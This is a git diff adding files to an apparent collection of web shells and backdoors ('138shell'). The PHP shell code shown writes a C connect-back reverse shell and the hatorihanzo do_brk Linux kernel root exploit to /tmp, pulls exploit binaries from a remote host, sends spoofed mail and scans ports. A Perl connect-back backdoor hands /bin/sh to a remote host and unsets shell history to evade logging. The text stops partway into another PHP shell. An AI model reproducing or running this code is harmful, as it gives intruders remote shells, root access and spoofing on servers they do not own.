+      echo "</TD>";
+      echo"<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Writable Folders</b><br><br>";
+      if ($dir = @opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_writable($file) && @is_dir($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+            echo "<font color=red>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo "</TD>";
+      echo "<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Writable Files</b> <br><br>";
+ 
+      if ($dir = opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_writable($file) && @is_file($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+    	    echo "<font color=red>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo "</TR>";
+      echo "</TABLE>";
+    }
+  }
+
+?>
+<?php
+
+  if ($shell == "write") {
+    $shell = "#include <stdio.h>\n" .
+             "#include <sys/socket.h>\n" .
+             "#include <netinet/in.h>\n" .
+             "#include <arpa/inet.h>\n" .
+             "#include <netdb.h>\n" .
+             "int main(int argc, char **argv) {\n" .
+             "  char *host;\n" .
+             "  int port = 80;\n" .
+             "  int f;\n" .
+             "  int l;\n" .
+             "  int sock;\n" .
+             "  struct in_addr ia;\n" .
+             "  struct sockaddr_in sin, from;\n" .
+             "  struct hostent *he;\n" .
+             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
+             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
+             "                \"For More Reliable Shell.\\n\"\n" .
+             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
+             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
+             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
+             "  if (argc < 2 || argc > 3) {\n" .
+             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Dumping Arguments\\n\");\n" .
+             "  l = strlen(argv[1]);\n" .
+             "  if (l <= 0) {\n" .
+             "    printf(\"[-] Invalid Host Name\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (!(host = (char *) malloc(l))) {\n" .
+             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  strncpy(host, argv[1], l);\n" .
+             "  if (argc == 3) {\n" .
+             "    port = atoi(argv[2]);\n" .
+             "    if (port <= 0 || port > 65535) {\n" .
+             "      printf(\"[-] Invalid Port Number\\n\");\n" .
+             "      return 1;\n" .
+             "    }\n" .
+             "  }\n" .
+             "  printf(\"[*] Resolving Host Name\\n\");\n" .
+             "  he = gethostbyname(host);\n" .
+             "  if (he) {\n" .
+             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
+             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
+             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  sin.sin_family = PF_INET;\n" .
+             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
+             "  sin.sin_port = htons(port);\n" .
+             "  printf(\"[*] Connecting...\\n\");\n" .
+             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
+             "    printf(\"[-] Socket Error\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
+             "    printf(\"[-] Unable to Connect\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Spawning Shell\\n\");\n" .
+             "  f = fork( );\n" .
+             "  if (f < 0) {\n" .
+             "    printf(\"[-] Unable to Fork\\n\");\n" .
+             "    return 1;\n" .
+             "  } else if (!f) {\n" .
+             "    write(sock, msg, sizeof(msg));\n" .
+             "    dup2(sock, 0);\n" .
+             "    dup2(sock, 1);\n" .
+             "    dup2(sock, 2);\n" .
+             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
+             "    close(sock);\n" .
+             "    return 0;\n" .
+             "  }\n" .
+             "  printf(\"[*] Detached\\n\\n\");\n" .
+             "  return 0;\n" .
+             "}\n";
+
+    $fp = fopen("/tmp/dc-connectback.c", "w");
+    $ok = fwrite($fp, $shell);
+
+    if (!empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Connect Back Shell Was Successfuly Copied</DIV>";
+    } else {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Shell</DIV>";
+    }
+  }
+
+  if ($kernel == "write") {
+    $kernel = "/*\n" .
+              " * hatorihanzo.c\n" .
+              " * Linux kernel do_brk vma overflow exploit.\n" .
+              " *\n" .
+              " * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
+              " *\n" .
+              " * Further research and exploit development by\n" .
+              " * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
+              " *\n" .
+              " * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
+              " *\n" .
+              " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
+              " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
+              "*/\n" .
+              "#define _GNU_SOURCE\n" .
+              "#include <stdio.h>\n" .
+              "#include <stdlib.h>\n" .
+              "#include <errno.h>\n" .
+              "#include <string.h>\n" .
+              "#include <unistd.h>\n" .
+              "#include <fcntl.h>\n" .
+              "#include <signal.h>\n" .
+              "#include <paths.h>\n" .
+              "#include <grp.h>\n" .
+              "#include <setjmp.h>\n" .
+              "#include <stdint.h>\n" .
+              "#include <sys/mman.h>\n" .
+              "#include <sys/ipc.h>\n" .
+              "#include <sys/shm.h>\n" .
+              "#include <sys/ucontext.h>\n" .
+              "#include <sys/wait.h>\n" .
+              "#include <asm/ldt.h>\n" .
+              "#include <asm/page.h>\n" .
+              "#include <asm/segment.h>\n" .
+              "#include <linux/unistd.h>\n" .
+              "#include <linux/linkage.h>\n" .
+              "#define kB   * 1024\n" .
+              "#define MB   * 1024 kB\n" .
+              "#define GB   * 1024 MB\n" .
+              "#define MAGIC             0xdefaced /* I should've patented this number -cliph */\n" .
+              "#define ENTRY_MAGIC 0\n" .
+              "#define ENTRY_GATE 2\n" .
+              "#define ENTRY_CS    4\n" .
+              "#define ENTRY_DS    6\n" .
+              "#define CS          ((ENTRY_CS << 2) | 4)\n" .
+              "#define DS          ((ENTRY_DS << 2) | 4)\n" .
+              "#define GATE        ((ENTRY_GATE << 2) | 4 | 3)\n" .
+              "#define LDT_PAGES   ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" .
+              "#define TOP_ADDR    0xFFFFE000U\n" .
+              "/* configuration */\n" .
+              "unsigned     task_size;\n" .
+              "unsigned     page;\n" .
+              "uid_t        uid;\n" .
+              "unsigned     address;\n" .
+              "int dontexit = 0;\n" .
+              "void fatal(char * msg)\n" .
+              "{\n" .
+              "      fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" .
+              "      if (dontexit) {\n" .
+              "             fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" .
+              "             kill(getpid(), SIGSTOP);\n" .
+              "             for (;;) pause();\n" .
+              "      }\n" .
+              "      exit(EXIT_FAILURE);\n" .
+              "}\n" .
+              "void configure(void)\n" .
+              "{\n" .
+              "      unsigned val;\n" .
+              "      task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" .
+              "      uid = getuid();\n" .
+              "}\n" .
+              "void expand(void)\n" .
+              "{\n" .
+              "      unsigned top = (unsigned) sbrk(0);\n" .
+              "      unsigned limit = address + PAGE_SIZE;\n" .
+              "      do {\n" .
+              "             if (sbrk(PAGE_SIZE) == NULL)\n" .
+              "                   fatal(\"Kernel seems not to be vulnerable\");\n" .
+              "             dontexit = 1;\n" .
+              "             top += PAGE_SIZE;\n" .
+              "      } while (top < limit);\n" .
+              "}\n" .
+              "jmp_buf jmp;\n" .
+              "#define MAP_NOPAGE 1\n" .
+              "#define MAP_ISPAGE 2\n" .
+              "void sigsegv(int signo, siginfo_t * si, void * ptr)\n" .
+              "{\n" .
+              "      struct ucontext * uc = (struct ucontext *) ptr;\n" .
+              "      int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" .
+              "      (void)signo;\n" .
+              "      (void)si;\n" .
+              "      error_code = MAP_NOPAGE + (error_code & 1);\n" .
+              "      longjmp(jmp, error_code);\n" .
+              "}\n" .
+              "void prepare(void)\n" .
+              "{\n" .
+              "      struct sigaction sa;\n" .
+              "      sa.sa_sigaction = sigsegv;\n" .
+              "      sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" .
+              "      sigemptyset(&sa.sa_mask);\n" .
+              "      sigaction(SIGSEGV, &sa, NULL);\n" .
+              "}\n" .
+              "int testaddr(unsigned addr)\n" .
+              "{\n" .
+              "      int val;\n" .
+              "      val = setjmp(jmp);\n" .
+              "      if (val == 0) {\n" .
+              "             asm (\"verr (%%eax)\" : : \"a\" (addr));\n" .
+              "             return MAP_ISPAGE;\n" .
+              "      }\n" .
+              "      return val;\n" .
+              "}\n" .
+              "#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" .
+              "#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" .
+              "#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" .
+              "void map(unsigned * map)\n" .
+              "{\n" .
+              "      unsigned addr = task_size;\n" .
+              "      unsigned bit = 1;\n" .
+              "      prepare();\n" .
+              "      while (addr < TOP_ADDR) {\n" .
+              "             if (testaddr(addr) == MAP_ISPAGE)\n" .
+              "                   *map |= bit;\n" .
+              "             addr += PAGE_SIZE;\n" .
+              "             next(map, bit);\n" .
+              "      }\n" .
+              "      signal(SIGSEGV, SIG_DFL);\n" .
+              "}\n" .
+              "void find(unsigned * m)\n" .
+              "{\n" .
+              "      unsigned addr = task_size;\n" .
+              "      unsigned bit = 1;\n" .
+              "      unsigned count;\n" .
+              "      unsigned tmp;\n" .
+              "      prepare();\n" .
+              "      tmp = address = count = 0U;\n" .
+              "      while (addr < TOP_ADDR) {\n" .
+              "             int val = testaddr(addr);\n" .
+              "             if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" .
+              "                   if (!tmp) tmp = addr;\n" .
+              "                   count++;\n" .
+              "             } else {\n" .
+              "                   if (tmp && count == LDT_PAGES) {\n" .
+              "                          errno = EAGAIN;\n" .
+              "                          if (address)\n" .
+              "                                fatal(\"double allocation\\n\");\n" .
+              "                          address = tmp;\n" .
+              "                   }\n" .
+              "                   tmp = count = 0U;\n" .
+              "             }\n" .
+              "             addr += PAGE_SIZE;\n" .
+              "             next(m, bit);\n" .
+              "      }\n" .
+              "      signal(SIGSEGV, SIG_DFL);\n" .
+              "      if (address)\n" .
+              "             return;\n" .
+              "      errno = ENOTSUP;\n" .
+              "      fatal(\"Unable to determine kernel address\");\n" .
+              "}\n" .
+              "int modify_ldt(int, void *, unsigned);\n" .
+              "void ldt(unsigned * m)\n" .
+              "{\n" .
+              "      struct modify_ldt_ldt_s l;\n" .
+              "      map(m);\n" .
+              "      memset(&l, 0, sizeof(l));\n" .
+              "      l.entry_number = LDT_ENTRIES - 1;\n" .
+              "      l.seg_32bit = 1;\n" .
+              "      l.base_addr = MAGIC >> 16;\n" .
+              "      l.limit = MAGIC & 0xffff;\n" .
+              "      if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
+              "             fatal(\"Unable to set up LDT\");\n" .
+              "      l.entry_number = ENTRY_MAGIC / 2;\n" .
+              "      if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
+              "             fatal(\"Unable to set up LDT\");\n" .
+              "      find(m);\n" .
+              "}\n" .
+              "asmlinkage void kernel(unsigned * task)\n" .
+              "{\n" .
+              "      unsigned * addr = task;\n" .
+              "      /* looking for uids */\n" .
+              "      while (addr[0] != uid || addr[1] != uid ||\n" .
+              "             addr[2] != uid || addr[3] != uid)\n" .
+              "             addr++;\n" .
+              "      addr[0] = addr[1] = addr[2] = addr[3] = 0;    /* uids */\n" .
+              "      addr[4] = addr[5] = addr[6] = addr[7] = 0;    /* uids */\n" .
+              "      addr[8] = 0;\n" .
+              "      /* looking for vma */\n" .
+              "      for (addr = (unsigned *) task_size; addr; addr++) {\n" .
+              "             if (addr[0] >= task_size && addr[1] < task_size &&\n" .
+              "                 addr[2] == address && addr[3] >= task_size) {\n" .
+              "                   addr[2] = task_size - PAGE_SIZE;\n" .
+              "                   addr = (unsigned *) addr[3];\n" .
+              "                   addr[1] = task_size - PAGE_SIZE;\n" .
+              "                   addr[2] = task_size;\n" .
+              "                   break;\n" .
+              "             }\n" .
+              "      }\n" .
+              "}\n" .
+              "void kcode(void);\n" .
+              "#define __str(s) #s\n" .
+              "#define str(s) __str(s)\n" .
+              "void __kcode(void)\n" .
+              "{\n" .
+              "      asm(\n" .
+              "             \"kcode:                                \\n\"\n" .
+              "             \"     pusha                            \\n\"\n" .
+              "             \"     pushl %es                        \\n\"\n" .
+              "             \"     pushl %ds                        \\n\"\n" .
+              "             \"     movl   $(\" str(DS) \") ,%edx      \\n\"\n" .
+              "             \"     movl   %edx,%es                  \\n\"\n" .
+              "             \"     movl   %edx,%ds                  \\n\"\n" .
+              "             \"     movl   $0xffffe000,%eax          \\n\"\n" .
+              "             \"     andl   %esp,%eax                 \\n\"\n" .
+              "             \"     pushl %eax                       \\n\"\n" .
+              "             \"     call   kernel                    \\n\"\n" .
+              "             \"     addl   $4, %esp                  \\n\"\n" .
+              "             \"     popl   %ds                       \\n\"\n" .
+              "             \"     popl   %es                       \\n\"\n" .
+              "             \"     popa                             \\n\"\n" .
+              "             \"     lret                             \\n\"\n" .
+              "      );\n" .
+              "}\n" .
+              "void knockout(void)\n" .
+              "{\n" .
+              "      unsigned * addr = (unsigned *) address;\n" .
+              "      if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" .
+              "             fatal(\"Unable to change page protection\");\n" .
+              "      errno = ESRCH;\n" .
+              "      if (addr[ENTRY_MAGIC] != MAGIC)\n" .
+              "             fatal(\"Invalid LDT entry\");\n" .
+              "      /* setting call gate and privileged descriptors */\n" .
+              "      addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" .
+              "      addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" .
+              "      addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" .
+              "      addr[ENTRY_CS+1] = 0x00cf9a00U;\n" .
+              "      addr[ENTRY_DS+0] = 0x0000ffffU; /* user   4GB code at 0x00000000 */\n" .
+              "      addr[ENTRY_DS+1] = 0x00cf9200U;\n" .
+              "      prepare();\n" .
+              "      if (setjmp(jmp) != 0) {\n" .
+              "             errno = ENOEXEC;\n" .
+              "             fatal(\"Unable to jump to call gate\");\n" .
+              "      }\n" .
+              "      asm(\"lcall $\" str(GATE) \",$0x0\");      /* this is it */\n" .
+              "}\n" .
+              "void shell(void)\n" .
+              "{\n" .
+              "      char * argv[] = { _PATH_BSHELL, NULL };\n" .
+              "      execve(_PATH_BSHELL, argv, environ);\n" .
+              "      fatal(\"Unable to spawn shell\\n\");\n" .
+              "}\n" .
+              "void remap(void)\n" .
+              "{\n" .
+              "      static char stack[8 MB];  /* new stack */\n" .
+              "      static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" .
+              "      static unsigned * m;\n" .
+              "      static unsigned b;\n" .
+              "      m = (unsigned *) sbrk(map_size);\n" .
+              "      if (!m)\n" .
+              "             fatal(\"Unable to allocate memory\");\n" .
+              "      environ = envp;\n" .
+              "      asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" .
+              "      b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" .
+              "      if (munmap((void*)b, task_size - b) == -1)\n" .
+              "             fatal(\"Unable to unmap stack\");\n" .
+              "      while (b < task_size) {\n" .
+              "             if (sbrk(PAGE_SIZE) == NULL)\n" .
+              "                   fatal(\"Unable to expand BSS\");\n" .
+              "             b += PAGE_SIZE;\n" .
+              "      }\n" .
+              "      ldt(m);\n" .
+              "      expand();\n" .
+              "      knockout();\n" .
+              "      shell();\n" .
+              "}\n" .
+              "int main(void)\n" .
+              "{\n" .
+              "      configure();\n" .
+              "      remap();\n" .
+              "      return EXIT_FAILURE;\n" .
+              "}\n";
+
+    $fp = fopen("/tmp/xpl_brk.c", "w");
+    $ok = fwrite($fp, $kernel);
+    
+    if (!empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Linux Local Kernel Exploit Was Successfuly Copied</DIV>";
+    } else {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Kernel Exploit</DIV>";
+    }
+  }
+
+?>
+</CENTER>
+<pre><font face="Tahoma" size="2">
+<?php
+
+// Function to Visualize Source Code files 
+if ($see != "") {
+  $fp = fopen($see, "r"); 
+  $read = fread($fp, 30000); 
+  echo "============== $see ================<br>";
+  echo "<textarea name=textarea cols=80 rows=15>"; 
+  echo "$read"; 
+  Echo "</textarea>"; 
+}
+
+// Function to Dowload Local Xploite Binary COde or Source Code
+
+if ($dx != "") {
+  $fp = @fopen("$hostxpl",r);
+  $fp2 = @fopen("$storage","w");
+  fwrite($fp2, "");
+  $fp1 = @fopen("$storage","a+");
+  for (;;) {
+    $read = @fread($fp, 4096);
+    if (empty($read)) break;
+    $ok = fwrite($fp1, $read);
+    
+    if (empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Uploading File</DIV>";
+      break;
+    }
+  }
+
+  if (!empty($ok)) {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] File Was Successfuly Uploaded</DIV>";
+  }
+}
+
+flush( );
+
+// Function to visulize Format Color Source Code PHP
+
+if ($sfc != "") {
+  $showcode = show_source("$sfc");
+  echo "<font size=4> $showcode </font>";
+}
+
+// Function to Visualize all infomation files
+if ($fileinfo != "") {
+  $infofile = stat("$fileanalize");
+  while (list($info, $value) = each ($infofile)) {
+    echo" Info: $info  Value: $value <br>";
+  }
+}
+
+// Function to send fake mail
+if ($fake == 1) {
+  echo "<FORM METHOD=POST ACTION=\"$SCRIPT_NAME?$QUERY_STRING&send=1\">";
+  echo "Your Fake Mail <INPUT TYPE=\"\" NAME=\"yourmail\"><br>";
+  echo "Your Cavy:<INPUT TYPE=\"\" NAME=\"cavy\"><br>";
+  echo "Suject: <INPUT TYPE=\"text\" NAME=\"subject\"><br>";
+  echo "Text: <TEXTAREA NAME=\"body\" ROWS=\"\" COLS=\"\"></TEXTAREA><br>";
+  echo "<INPUT TYPE=\"hidden\" NAME=\"send\" VALUE=\"1\"><br>";
+  echo "<INPUT TYPE=\"submit\" VALUE=\"Send Fake Mail\">";
+  echo "</FORM>";
+}
+
+if($send == 1) {
+  if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Mail Send Sucessfuly</DIV>";
+  } else {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Sending Mail</DIV>";
+  }
+}
+
+if ($portscan != "") {
+  $port = array ("21","22","23","25","110",);
+  $values = count($port);
+  for ($cont=0; $cont < $values; $cont++) {
+    @$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1);
+    $service = Getservbyport($port[$cont],"tcp");
+    @$get = fgets($sock[$cont]);
+    echo "<br>Port: $port[$cont] - Service: $service<br><br>";
+    echo "<br>Banner: $get <br><br>";
+    flush();
+  }
+}
+
+?> 
+</font></pre>
\ No newline at end of file
diff --git a/138shell/P/PHP Backdoor Connect.pl.txt b/138shell/P/PHP Backdoor Connect.pl.txt
new file mode 100644
index 0000000..2e34ca1
--- /dev/null
+++ b/138shell/P/PHP Backdoor Connect.pl.txt	
@@ -0,0 +1,61 @@
+#!/usr/bin/perl
+use IO::Socket;
+#IRAN HACKERS SABOTAGE Connect Back Shell          
+#code by:LorD
+#We Are :LorD-C0d3r-NT                                           
+#Email:LorD@ihsteam.com
+#
+#lord@SlackwareLinux:/home/programing$ perl dc.pl
+#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#Usage: dc.pl [Host] [Port]
+#
+#Ex: dc.pl 127.0.0.1 2121
+#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
+#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#[*] Resolving HostName
+#[*] Connecting... 127.0.0.1
+#[*] Spawning Shell
+#[*] Connected to remote host
+
+#bash-2.05b# nc -vv -l -p 2121
+#listening on [any] 2121 ...
+#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
+#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
+#
+#--==Systeminfo==--
+#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
+#
+#--==Userinfo==--
+#uid=1001(lord) gid=100(users) groups=100(users)
+#
+#--==Directory==--
+#/root
+#
+#--==Shell==--
+#
+$system    = '/bin/sh';
+$ARGC=@ARGV;
+print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
+if ($ARGC!=2) {
+   print "Usage: $0 [Host] [Port] \n\n";
+   die "Ex: $0 127.0.0.1 2121 \n";
+}
+use Socket;
+use FileHandle;
+socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
+connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
+print "[*] Resolving HostName\n";
+print "[*] Connecting... $ARGV[0] \n";
+print "[*] Spawning Shell \n";
+print "[*] Connected to remote host \n";
+SOCKET->autoflush();
+open(STDIN, ">&SOCKET");
+open(STDOUT,">&SOCKET");
+open(STDERR,">&SOCKET");
+print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
+system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
+echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
+system($system);
+#EOF
\ No newline at end of file
diff --git a/138shell/P/PHP Shell.php.txt b/138shell/P/PHP Shell.php.txt
new file mode 100644
index 0000000..0b1f12b
--- /dev/null
+++ b/138shell/P/PHP Shell.php.txt	
@@ -0,0 +1,1010 @@
+<?php 
+
+/*
+*****************************************************************************************
+*                           PHPSHELL.PHP  BY MACKER     August 28th 2003                *
+***************************************************************************************** 
+*                                                                                       *  
+*   Welcome to Macker's PHPShell script...                                              * 
+*   This script will allow you to browse webservers etc...                              * 
+*   Just copy the file to your directory and open it in your Internet Browser.          * 
+*                                                                                       * 
+*   The webserver should support PHP...                                                 * 
+*                                                                                       * 
+*   You can modify the script if you want, but please send me a copy to:                *  
+*                               DRAZZ01@HOTMAIL.COM                                     * 
+***************************************************************************************** 
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+!!   PLEASE NOTE: You should use this script at own risk, it should do damage to the   !! 
+!!                Sites or even the server... You are responsible for your own deeds.  !! 
+!!                The admin of your webserver should always know you are using this    !!
+!!                script.                                                              !! 
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+*/ 
+
+
+/*Setting some envirionment variables...*/ 
+
+/* I added this to ensure the script will run correctly...
+   Please enter the Script's filename in this variable. */   
+$SFileName=$PHP_SELF;
+
+/* uncomment the two following variables if you want to use http
+   authentication. This will password protect your PHPShell */
+//$http_auth_user = "phpshell";	/* HTTP Authorisation username, uncomment if you want to use this */
+//$http_auth_pass = "phpshell";	/* HTTP Authorisation password, uncomment if you want to use this */	    
+
+error_reporting(0);
+$PHPVer=phpversion();
+$isGoodver=(intval($PHPVer[0])>=4);
+$scriptTitle = "PHPShell";
+$scriptident = "$scriptTitle by Macker";
+
+$urlAdd = "";
+$formAdd = "";
+
+function walkArray($array){
+  while (list($key, $data) = each($array))
+    if (is_array($data)) { walkArray($data); }
+    else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
+}
+
+if (isset($_PUT)) walkArray($_PUT);
+if (isset($_GET)) walkArray($_GET);
+if (isset($_POST)) walkArray($_POST);
+
+
+$pos = strpos($urlAdd, "s=r");
+if (strval($pos) != "") {
+$urlAdd= substr($urlAdd, 0, $pos);
+}
+
+$urlAdd .= "&s=r&";
+
+if (empty($Pmax))
+	$Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
+if (empty($Pidx)) 
+	$Pidx = 0;
+
+$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
+$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+
+$scriptdate = "August 28th 2003";
+$scriptver = "Version 2.6.6dev";
+$LOCAL_IMAGE_DIR = "img";
+$REMOTE_IMAGE_URL = "img";
+$img = array(
+				"Edit" 		=> "edit.gif",
+				"Download" 	=> "download.gif",
+				"Upload" 	=> "upload.gif",
+				"Delete" 	=> "delete.gif",
+				"View" 		=> "view.gif",
+				"Rename" 	=> "rename.gif",
+				"Move" 		=> "move.gif",
+				"Copy" 		=> "copy.gif",
+				"Execute" 	=> "exec.gif"
+            );
+
+while (list($id, $im)=each($img))
+	if (file_exists("$LOCAL_IMAGE_DIR/$im"))
+		$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
+	else
+ 		$img[$id] = "[$id]";
+
+
+
+
+/* HTTP AUTHENTICATION */
+
+    if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
+	    setcookie("noauth","");
+	    Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
+	    Header( "HTTP/1.0  401  Unauthorized");
+	    echo "Your username or password is incorrect";
+	    exit ;
+			     
+    } 
+
+function buildUrl($display, $url) {
+        global $urlAdd;
+        $url = $SFileName . "?$urlAdd$url";
+	return "<a href=\"$url\">$display</a>";
+}
+
+function sp($mp) {
+	for ( $i = 0; $i < $mp; $i++ )
+		$ret .= "&nbsp;";
+	return $ret;
+}
+
+function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
+
+function Mydeldir($Fdir) {
+	if (is_dir($Fdir)) {
+		$Fh=@opendir($Fdir);
+ 		while ($Fbuf = readdir($Fh))
+ 			if (($Fbuf != ".") && ($Fbuf != ".."))
+				Mydeldir("$Fdir/$Fbuf");
+		@closedir($Fh);
+				return rmdir($Fdir);
+	}	else {
+		return unlink($Fdir);
+	}
+}
+
+
+function arrval ($array) {
+list($key, $data) = $array;
+return $data;
+}
+
+function formatsize($insize) {  
+	$size = $insize;
+	$add = "B";
+	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "KB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "MB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "GB";
+ 	}
+ 	if ($size > 1024) {
+ 		$size = intval(intval($size) / 1.024)/1000;
+ 		$add = "TB";
+ 	}
+ 	return "$size $add";
+}
+
+if ($cmd != "downl") {
+	?>
+
+<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
+<HTML>
+ <HEAD>
+  <STYLE>
+  <!--
+    A{ text-decoration:none; color:navy; font-size: 12px }
+    body { font-size: 12px; 
+           font-family: arial, helvetica;
+            scrollbar-width: 5;
+            scrollbar-height: 5;
+            scrollbar-face-color: white;
+            scrollbar-shadow-color: silver;
+            scrollbar-highlight-color: white;
+            scrollbar-3dlight-color:silver;
+            scrollbar-darkshadow-color: silver;
+            scrollbar-track-color: white;
+            scrollbar-arrow-color: black;
+    }
+    Table { font-size: 12px; }
+    TR{ font-size: 12px; }
+    TD{ font-size: 12px; 
+        font-family: arial, helvetical;
+        BORDER-LEFT: black 0px solid; 
+	BORDER-RIGHT: black 0px solid; 
+	BORDER-TOP: black 0px solid; 
+	BORDER-BOTTOM: black 0px solid; 
+	COLOR: black; 
+    }
+    .border{       BORDER-LEFT: black 1px solid;
+ 		   BORDER-RIGHT: black 1px solid;
+ 		   BORDER-TOP: black 1px solid;
+ 		   BORDER-BOTTOM: black 1px solid;
+ 		 }
+    .none  {       BORDER-LEFT: black 0px solid;
+ 		   BORDER-RIGHT: black 0px solid;
